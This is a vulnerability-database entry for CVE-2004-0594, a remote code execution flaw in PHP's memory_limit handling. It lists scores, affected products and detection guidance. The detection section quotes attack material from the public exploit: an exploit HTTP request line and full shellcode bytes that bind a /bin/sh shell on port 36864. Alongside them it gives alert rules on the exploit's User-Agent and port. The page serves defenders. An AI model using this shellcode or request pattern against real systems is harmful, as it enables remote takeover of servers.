cbcvebase.
CVE-2004-0594
published 2004-07-27

CVE-2004-0594: The memory_limit functionality in PHP 4.x up to 4.3.7, and 5.x up to 5.0.0RC3, under certain conditions such as when register_globals is enabled, allows remote…

PriorityP347medium5.1CVSS 2.0
AVNACHAuNCPIPAP
EXPLOIT
EPSS
54.86%
98.9th percentile
The memory_limit functionality in PHP 4.x up to 4.3.7, and 5.x up to 5.0.0RC3, under certain conditions such as when register_globals is enabled, allows remote attackers to execute arbitrary code by triggering a memory_limit abort during execution of the zend_hash_init function and overwriting a HashTable destructor pointer before the initialization of key data structures is complete.

Affected

13 ranges
VendorProductVersion rangeFixed in
avayaconverged_communications_server
debiandebian_linux
hphp-ux
hphp-ux
hphp-ux
hphp-ux
openpkgopenpkg
openpkgopenpkg
phpphp
phpphp>= 4.0 < 4.3.74.3.7
trustixsecure_linux
trustixsecure_linux
trustixsecure_linux

Detection & IOCsextracted from sources · hover to see the quote

port36864
path/info.php
commandPOST /info.php?a[1]=test HTTP/1.0
otherContent-Type: multipart/form-data; boundary=------------ BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
bytes
\xeb\x72\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c\x40\x89\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\x43\xc6\x46\x10\x10\x66\x89\x5e\x14\x88\x46\x08\x29\xc0\x89\xc2\x89\x46\x18\xb0\x90\x66\x89\x46\x16\x8d\x4e\x14\x89\x4e\x0c\x8d\x4e\x08\xb0\x66\xcd\x80\x89\x5e\x0c\x43\x43\xb0\x66\xcd\x80\x89\x56\x0c\x89\x56\x10\xb0\x66\x43\xcd\x80\x86\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0\x3f\x41\xcd\x80\xb0\x3f\x41\xcd\x80\x88\x56\x07\x89\x76\x0c\x87\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80\xe8\x89\xff\xff\xff/bin/sh
  • Alert on inbound HTTP requests bearing the User-Agent string 'mlxdebug', which is hardcoded in the public exploit for CVE-2004-0594.
  • Monitor for unexpected outbound or inbound TCP connections on port 36864, which is the bind-shell port opened by the exploit's shellcode upon successful exploitation.
  • Detect multipart/form-data POST requests containing nested array form-field names (e.g., name="a[][]") sent in large quantities; the exploit uses repeated submissions of such requests to exhaust PHP memory and trigger the memory_limit abort.
  • The exploit targets PHP installations where register_globals is enabled; audit PHP configurations for 'register_globals = On' as a high-risk indicator of exploitability.
  • ·The vulnerability is only exploitable when the PHP 'memory_limit' configuration setting is enabled AND 'register_globals' is also enabled. Disabling either setting mitigates the attack vector.
  • ·The exploit requires the attacker to force the PHP interpreter to allocate more memory than the memory_limit setting before script execution begins; the attack is conditional on the memory_limit being reachable via attacker-controlled input.

CVSS provenance

nvdv2.05.1MEDIUMAV:N/AC:H/Au:N/C:P/I:P/A:P
vendor_redhat5.1MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.